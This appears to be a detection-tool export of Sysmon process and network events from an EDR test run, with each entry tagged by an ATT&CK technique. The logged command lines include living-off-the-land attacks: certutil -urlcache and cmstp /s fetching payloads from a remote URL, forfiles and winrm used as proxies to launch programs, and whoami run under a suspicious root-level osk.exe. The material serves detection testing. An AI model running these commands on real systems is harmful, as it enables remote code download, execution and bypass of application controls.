<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001051638E00</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c winrm qc -q </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.337716Z"">
</TimeCreated>
<EventRecordID>4991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.285</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ProcessId"">1580</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.337716Z"">
</TimeCreated>
<EventRecordID>4991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.285</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ProcessId"">1580</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.313087Z"">
</TimeCreated>
<EventRecordID>4990</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.246</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001051638E00</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c winrm qc -q </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN &quot;Microsoft\Windows\Customer Experience Improvement Program\Uploader&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:00:01.539020Z"">
</TimeCreated>
<EventRecordID>1966503</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:00:01.529</Data>
<Data Name=""ProcessGuid"">365ABB72-5851-5C91-0000-00107D050A00</Data>
<Data Name=""ProcessId"">2716</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\schtasks.exe /delete /f /TN &quot;Microsoft\Windows\Customer Experience Improvement Program\Uploader&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-5851-5C91-0000-0010E1030A00</Data>
<Data Name=""ParentProcessId"">2772</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wsqmcons.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\System32\wsqmcons.exe </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) using process (C:\Windows\System32\forfiles.exe) as a proxy to launch calc.exe (indirect command execution via forfiles /c) through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ) with parent commandline ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:30.685271Z"">
</TimeCreated>
<EventRecordID>4988</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:30.462</Data>
<Data Name=""ProcessGuid"">747F3D96-6666-5D3F-0000-0010AE068E00</Data>
<Data Name=""ProcessId"">1464</Data>
<Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6666-5D3F-0000-001016F78D00</Data>
<Data Name=""ParentProcessId"">2244</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe ) with commandline ( whoami ) run as NT AUTHORITY\SYSTEM from parent image ( C:\osk.exe ) at the drive root rather than System32 ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:58:44.237867Z"">
</TimeCreated>
<EventRecordID>1966501</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:58:44.187</Data>
<Data Name=""ProcessGuid"">365ABB72-5804-5C91-0000-001044DE0900</Data>
<Data Name=""ProcessId"">2456</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-57FB-5C91-0000-00104FD40900</Data>
<Data Name=""ParentProcessId"">2128</Data>
<Data Name=""ParentImage"">C:\osk.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\osk.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:30.237042Z"">
</TimeCreated>
<EventRecordID>4986</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:30.221</Data>
<Data Name=""ProcessGuid"">747F3D96-6666-5D3F-0000-001016F78D00</Data>
<Data Name=""ProcessId"">2244</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:25.202954Z"">
</TimeCreated>
<EventRecordID>4983</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:25.180</Data>
<Data Name=""ProcessGuid"">747F3D96-6661-5D3F-0000-00107AB88D00</Data>
<Data Name=""ProcessId"">6428</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\certutil.exe which initiated an outbound network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:21.867545Z"">
</TimeCreated>
<EventRecordID>4982</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.735</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49833</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\certutil.exe which initiated an outbound network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:21.867100Z"">
</TimeCreated>
<EventRecordID>4981</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.619</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49832</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:20.459065Z"">
</TimeCreated>
<EventRecordID>4980</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.410</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
<Data Name=""ParentProcessId"">7088</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
